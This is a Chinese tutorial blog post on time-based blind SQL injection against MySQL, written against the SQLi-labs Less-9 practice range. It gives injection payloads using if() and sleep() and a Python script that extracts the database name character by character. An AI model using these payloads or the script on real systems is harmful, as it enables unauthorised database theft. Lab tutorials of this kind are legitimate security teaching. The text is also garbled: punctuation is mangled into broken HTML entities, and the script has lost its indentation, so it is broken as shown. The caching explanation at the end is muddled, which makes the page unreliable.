弊端|篇文章_超硬核，SQL注入之时间盲注，原理+步骤+实战思路

篇首语：本文由编程笔记#小编为大家整理，主要介绍了超硬核，SQL注入之时间盲注，原理+步骤+实战思路相关的知识，希望对你有一定的参考价值。

「作者主页」&＃xff1a;士别三日wyx
「作者简介」&＃xff1a;CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「专栏简介」&＃xff1a;此文章已录入专栏《网络安全快速入门》

时间盲注

• 一、什么是时间盲注&＃xff1f;
• 二、使用场景
• 三、使用步骤
• • 第一步&＃xff1a;判断注入点
  • 第二步&＃xff1a;判断长度
  • 第三步&＃xff1a;枚举字符
  
  
• 四、时间盲注的弊端
• 五、盲注脚本
• 六、实战思路
• • 1. 判断是否存在时间盲注
  • • 原理分析
    
    
  • 2. 脱库
  • • 2.1 判断返回结果的长度
    • • 原理分析
      
      
    • 2.2 枚举字符
    • • 原理分析
      
      
    
    
  
  
• 七、误差判断
• 推荐专栏

一、什么是时间盲注&＃xff1f;

时间盲注是指基于时间的盲注&＃xff0c;也叫延时注入&＃xff0c;根据页面的响应时间来判断是否存在注入。

二、使用场景

时间盲注使用的优先级并不高&＃xff0c;通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑使用&＃xff1a;

1. 页面没有回显位置&＃xff08;联合注入无法使用&＃xff09;
2. 页面不显示数据库的报错信息&＃xff08;报错注入无法使用&＃xff09;
3. 无论成功还是失败&＃xff0c;页面只响应一种结果&＃xff08;布尔盲注无法使用&＃xff09;

三、使用步骤

时间盲注的使用方式跟布尔盲注大同小异&＃xff0c;可以分为三个步骤。

第一步&＃xff1a;判断注入点

依次尝试以下类型的测试payload&＃xff0c;延时5秒以上则说明判断成立&＃xff0c;即存在注入

?id&＃61;1 and if(1,sleep(5),3) -- a
?id&＃61;1&＃39; and if(1,sleep(5),3) -- a
?id&＃61;1" and if(1,sleep(5),3) -- a
括号及各种过滤类型……


提示&＃xff1a;sleep的时间可以自定义&＃xff0c;时间太长效率太低、时间太短则不容易判断。

第二步&＃xff1a;判断长度

利用mysql的 if() 和 sleep() 判断查询结果的长度&＃xff0c;从1开始判断&＃xff0c;并依次递增。

?id&＃61;1&＃39; and if((length(查询语句) &＃61;1), sleep(5), 3) -- a


如果页面响应时间超过5秒&＃xff0c;说明长度判断正确&＃xff08;sleep(5)&＃xff09;;
如果页面响应时间不超过5秒&＃xff08;正常响应&＃xff09;&＃xff0c;说明长度判断错误&＃xff0c;继续递增判断长度。

第三步&＃xff1a;枚举字符

利用MySQL的 if() 和 sleep() 判断字符的内容。
从查询结果中截取第一个字符&＃xff0c;转换成ASCLL码&＃xff0c;从32开始判断&＃xff0c;递增至126。
关于ASCLL码可参考我的另一篇文章&＃xff1a;ASCLL编码对照表

?id&＃61;1&＃39; and if((ascii(substr(查询语句,1,1)) &＃61;1), sleep(5), 3) -- a


如果页面响应时间超过5秒&＃xff0c;说明字符内容判断正确&＃xff1b;
如果页面响应时间不超过5秒&＃xff08;正常响应&＃xff09;&＃xff0c;说明字符内容判断错误&＃xff0c;递增猜解该字符的其他可能性。

第一个字符猜解成功后&＃xff0c;依次猜解第二个、第三个……第n个&＃xff08;n表示返回结果的长度&＃xff09;。

四、时间盲注的弊端

1. 时间盲注的时间复杂度较高&＃xff0c;需要消耗大量的时间。
2. 时间盲注容易受到网络波动等因素的影响&＃xff0c;从而产生误差。

时间盲注误差大、时间成本高&＃xff0c;通常情况下&＃xff0c;能够证明注入存在就可以了。

五、盲注脚本

时间盲注通常会使用脚本自动化猜解&＃xff0c;Python脚本如下&＃xff0c;可按需修改&＃xff1a;

import requests
import time
# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload
# 目标网址&＃xff08;不带参数&＃xff09;
url &＃61; "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/"
# 猜解长度使用的payload
payload_len &＃61; """?id&＃61;1&＃39; and if(
(length(database()) &＃61;n)
,sleep(5),3) -- a"""
# 枚举字符使用的payload
payload_str &＃61; """?id&＃61;1&＃39; and if(
(ascii(
substr(
(database())
,n,1)
) &＃61;r)
, sleep(5), 3) -- a"""
# 获取长度
def getLength(url, payload):
length &＃61; 1 # 初始测试长度为1
while True:
start_time &＃61; time.time()
response &＃61; requests.get(url&＃61; url&＃43;payload_len.format(n&＃61; length))
# 页面响应时间 &＃61; 结束执行的时间 - 开始执行的时间
use_time &＃61; time.time() - start_time
# 响应时间>5秒时&＃xff0c;表示猜解成功
if use_time > 5:
print(&＃39;测试长度完成&＃xff0c;长度为&＃xff1a;&＃39;, length,)
return length;
else:
print(&＃39;正在测试长度&＃xff1a;&＃39;,length)
length &＃43;&＃61; 1 # 测试长度递增
# 获取字符
def getStr(url, payload, length):
str &＃61; &＃39;&＃39; # 初始表名/库名为空
# 第一层循环&＃xff0c;截取每一个字符
for l in range(1, length&＃43;1):
# 第二层循环&＃xff0c;枚举截取字符的每一种可能性
for n in range(33, 126):
start_time &＃61; time.time()
response &＃61; requests.get(url&＃61; url&＃43;payload_str.format(n&＃61; l, r&＃61; n))
# 页面响应时间 &＃61; 结束执行的时间 - 开始执行的时间
use_time &＃61; time.time() - start_time
# 页面中出现此内容则表示成功
if use_time > 5:
str&＃43;&＃61; chr(n)
print(&＃39;第&＃39;, l, &＃39;个字符猜解成功&＃xff1a;&＃39;, str)
break;
return str;
# 开始猜解
length &＃61; getLength(url, payload_len)
getStr(url, payload_str, length)

六、实战思路

试验靶场&＃xff1a;SQLi LABS Less 9
注入情况&＃xff1a;单引号字符型注入

1. 判断是否存在时间盲注

确定注入点以后&＃xff0c;需要判断网页是否存在时间盲注&＃xff0c;同时满足以下两种情况时&＃xff0c;可以确定存在时间盲注&＃xff1a;

?id&＃61;1&＃39; and if(1, sleep(5), 3) -- a 延时5秒响应
?id&＃61;1&＃39; and if(0,sleep(5),3) -- a 正常响应


原理分析

if() 函数的第一个参数是条件表达式&＃xff0c;1会转换为 True&＃xff0c;0会转换为 False。
条件表达式结果为 True 时&＃xff0c;会执行第二个参数位置的代码&＃xff0c;即 sleep(5)&＃xff0c;延时5秒响应&＃xff1b;
条件表达式结果为 False 时&＃xff0c;会执行第三个参数位置的代码&＃xff0c;即 3&＃xff0c;自定义的占位符&＃xff0c;无实际意义&＃xff0c;页面正常响应。

2. 脱库

确定时间盲注存在以后&＃xff0c;就可以进行脱库了。
脱库分为两个步骤&＃xff1a;判断长度、枚举字符

2.1 判断返回结果的长度

我们以判断当前使用的数据库名的长度来举例&＃xff0c;首先判断长度是否大于1。

?id&＃61;1&＃39; and if(
(length(database()) >1)
,sleep(5),3) -- a


原理分析

payload拼接到SQL中&＃xff0c;执行过程如下&＃xff1a;

库名的长度肯定大于1&＃xff0c;如果页面响应时间大于5秒&＃xff0c;说明payload可用&＃xff0c;开始从1开始测试长度&＃xff0c;依次递增&＃xff1a;

2.2 枚举字符

库名可用的字符有95个&＃xff0c;比如大小写字母、数字、下划线等特殊字符。
我们截取第一个字符&＃xff0c;穷举这95种可能性即可&＃xff0c;为了方便猜解&＃xff0c;我们将字符转换为ASCLL码再进行判断&＃xff08;字符对应的ASCLL为 32~126&＃xff09;。

先判断当前使用的数据库名 第一个字符的ASCLL码是否大于1&＃xff1a;

?id&＃61;1&＃39; and if(
(ascii(
substr(
(database())
,1,1)
) >1)
, sleep(5), 3) -- a


原理分析

payload拼接到SQL中&＃xff0c;执行过程如下&＃xff1a;

第一个字符的ASCLL码肯定大于1&＃xff0c;页面响应5秒以上&＃xff0c;说明payload可用,。
依次判断32到126&＃xff0c;页面响应5秒以上说明猜解正确&＃xff1b;页面正常响应说明猜解错误。
猜解成功第一个字符后&＃xff0c;再依次猜解第二、第三……第n个字符&＃xff08;n表示返回结果的长度&＃xff09;。

七、误差判断

同样的payload&＃xff0c;如果第一次响应时间很长&＃xff0c;但第二次响应时间很短&＃xff0c;就说明是受到了网络波动的影响。如果两次响应时间都很长&＃xff0c;则说明延时成功。

原理&＃xff1a;数据库会将执行过的SQL语句及执行结果放到缓存里&＃xff0c;以减小数据库的访问压力。数据库在执行SQL时&＃xff0c;会先找缓存&＃xff0c;如果缓存存在一样的SQL&＃xff0c;则会直接返回缓存中的查询结果&＃xff0c;而不会查找数据库。
这就意味着同样一条SQL&＃xff0c;第一次执行时&＃xff0c;会消耗较多的时间&＃xff08;查数据库&＃xff09;&＃xff1b;而第二次执行时&＃xff0c;几乎不消耗时间&＃xff08;查缓存&＃xff09;。

推荐专栏

《网络安全快速入门》用最短的时间&＃xff0c;掌握最核心的网络安全技术。
《靶场通关教程》各种靶场的通关教程&＃xff0c;持续更新……

阅读世界，共赴山海


423全民读书节，邀你共读